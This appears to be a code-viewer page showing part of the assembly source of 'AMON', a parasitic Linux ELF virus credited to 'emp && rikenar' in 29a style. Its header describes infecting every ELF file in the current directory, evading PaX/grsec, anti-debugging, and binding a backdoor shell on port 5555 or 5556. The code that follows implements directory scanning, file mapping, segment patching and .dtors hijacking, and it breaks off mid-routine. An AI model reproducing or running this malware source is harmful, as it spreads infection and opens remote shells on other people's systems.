📄 29a-7.012
字号:
;------------------------------------------------------------------------------
;
; AMON by emp && rikenar
; ----------------------
;
;
;
;
;
; AMON : parasitic ELF virus
;
;
;
;
; Description :
; -------------
;
; - Infect all ELF in the current directory.
; - Full compatible with all kernel 2.2.x,2.4.x and probably with all 2.6.x.
; - Full compatible with all options of kernel security patch (PaX/grsec ...).
; - Use basic EPO technic.
; - Use basic anti debug trick.
; - Bind a shell on port 5556 if UID = 0 else bind a shell on port 5555.
; - Only 960 bytes with complete strip.
; - Restore date and time of last modification.
;
;
;
; Tested on - redhat 9.0 (kernel 2.4.20 && 2.4.21+grsec/PaX)
; - debian 3.0 (kernel 2.2.20 && 2.2.25+PaX)
; - KNOPPIX 3.2 (kernel 2.4.21)
;
;
;
;
;
;
;anonymous@neptune ~/code/amon $ cat Makefile
;all:
; @echo "-+ amon by rikenar and emp +-"
; nasm -f elf amon.asm
; cc amon.o -o amon -nostdlib
; rm -f amon.o
;
;strip:
; strip amon
; sstrip amon
;
;
;anonymous@neptune ~/code/amon $ make
;-+ amon by rikenar and emp +-
;nasm -f elf amon.asm
;cc amon.o -o amon -nostdlib
;rm -f amon.o
;
;
;anonymous@neptune ~/code/amon $ make strip
;strip amon
;sstrip amon
;
;
;anonymous@neptune ~/code/amon $ ls -l amon
;-rwx------ 1 anonymous anonymous 960 nov 7 01:48 amon
;
;
;
;
;
;greetz : people on #ioc and all our friends
;
;------------------------------------------------------------------------------
%define sys_fork 2
%define sys_read 3
%define sys_open 5
%define sys_close 6
%define sys_exec 11
%define sys_getpid 20
%define sys_getuid 24
%define sys_ptrace 26
%define sys_kill 37
%define sys_dup2 63
%define sys_mmap 90
%define sys_munmap 91
%define sys_ftruncate 93
%define sys_socket 102
%define sys_fstat 108
%define sys_getdents 141
%define PT_LOAD 01
%define O_RDWR 2
%define LISTEN 4
%define SIGKILL 9
%define ELFMAG 0x464C457F
global _start
section .evil
_start:
;ptrace(PTRACE_TRACEME, 0, 0x1, 0)
;
;
;anti debug trick
xor eax, eax
cdq
inc edx
xor ecx, ecx
xor ebx, ebx ;PTRACE_TRACEME
xor esi, esi
mov al, sys_ptrace
int 0x80
test eax, eax ;
jne NEAR byebye ;if code is traced then exit
call bomb
;----------------------------------------------------------------------------
;
; find file to infect and call the infection function
push '.'
mov ebx, esp
call opendir ;open current directory
call getdents ;list file of this directory
add esp, 0x08 ;next name
again:
mov ebx, esp
add ebx, 2
mov esi, ebx
call openfile ; open file
cmp ah, 0xFF ; if error on open
je nextf ; find another file
call verif ; test file type and infection
test eax, eax ;
je nextf ; find another file
mov eax, sys_fstat
sub esp, 0x40
mov ecx, esp
int 0x80 ; file size
add esp, 0x40 ;
push DWORD [ecx+0x28]
push DWORD [ecx+0x20]
push esi ; save name of file for utime.
mov ecx, [ecx+0x14] ; ecx = st_size
mov esi, ecx
call infection ; WAR IS ON !
xchg ebx, esi ; fd in esi.
mov eax, 0x1e
pop ebx
mov ecx, esp
int 0x80
add esp, 8
nextf:
xchg esi, ebx ; fd in ebx.
mov eax, sys_close
int 0x80
call nextfile ; find next file
test eax, eax
jne again
exit:
byebye:
xor eax, eax
inc eax ; bye bye
xor ebx, ebx
int 0x80
;---------------------------------------------------------------------------
;
; infection functions
infection:
add ecx, 0x2000
and ecx, 0xFFFFF000
mov eax, sys_ftruncate ; size of file multiple of 0x1000
int 0x80 ;
push ebx ; save fd
push ecx ; push size of file for unmap
call Mapping ; map file, adress of map in eax.
xchg esi, ecx
mov ebx, [eax+0x1c]
add bx, WORD [eax+0x2a] ; phdr INTERP.
mov esi, [eax+ebx+0x04] ; offset of this phdr.
push esi
sub ecx, esi ; size of code to move.
sub esp, ecx
add esi, eax
mov edx, ecx
mov edi, esp
rep movsb ;
mov esi, esp
mov ecx, edx
mov ebx, [eax+0x1c]
add bx, WORD [eax+0x2a]
mov edi, [eax+ebx+4]
add edi, eax
add edi, 0x1000
rep movsb
add esp, edx ;
call PatchSegment ; Patch segments.
pop edi
push eax
mov ecx, edi
call PatchSection ; Patch sections.
pop eax
mov ecx, 0x1000
add [eax+0x20], ecx ; Patch e_shoff.
call delta
delta: pop ebx
sub ebx, delta ; delta offset.
mov esi, _start
add esi, ebx
add ebp, edi ; ebp = adress of code
add edi, eax
mov ecx, fin_code - _start
rep movsb ; write code.
mov ebx, eax
call hijackDtors ; hijack .dtors.
pop ecx ; restaure the size
call Demap
pop ebx ; restaure fd
ret
;----------------------------------------------------------------------------
;
;in : name directory in ebx
;out : fd in eax
opendir:
xor eax, eax
mov al, sys_open
xor ecx, ecx ;O_RDONLY
xor edx, edx ;
int 0x80
ret
;-----------------------------------------------------------------------------
;
;in : pointer to name of file in ebx
;out : fd in ebx
openfile:
xor eax, eax
mov al, sys_open ;open
xor ecx, ecx
mov cl, O_RDWR
xor edx, edx
int 0x80
ret
;-----------------------------------------------------------------------------
;
;in : directory fd in eax
;out : result of getdents on stack
getdents:
pop esi ;save ret addr
sub esp, 0x10000 ;i want some place on stack
xchg eax, ebx
xor eax, eax
mov al, sys_getdents
mov ecx, esp
mov edx, 0x10000
int 0x80
push esi ;
ret
;-----------------------------------------------------------------------------
;
;in : file fd in eax
;out : ebx == NULL if file type false or infection true
verif:
xchg ebx, eax
call read
cmp eax, ELFMAG ;if file is not an ELF
je verifsuite
xor eax, eax ;eax == 0
ret ;
verifsuite:
;check infection
mov eax, sys_fstat
sub esp, 0x40
mov ecx, esp
int 0x80
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -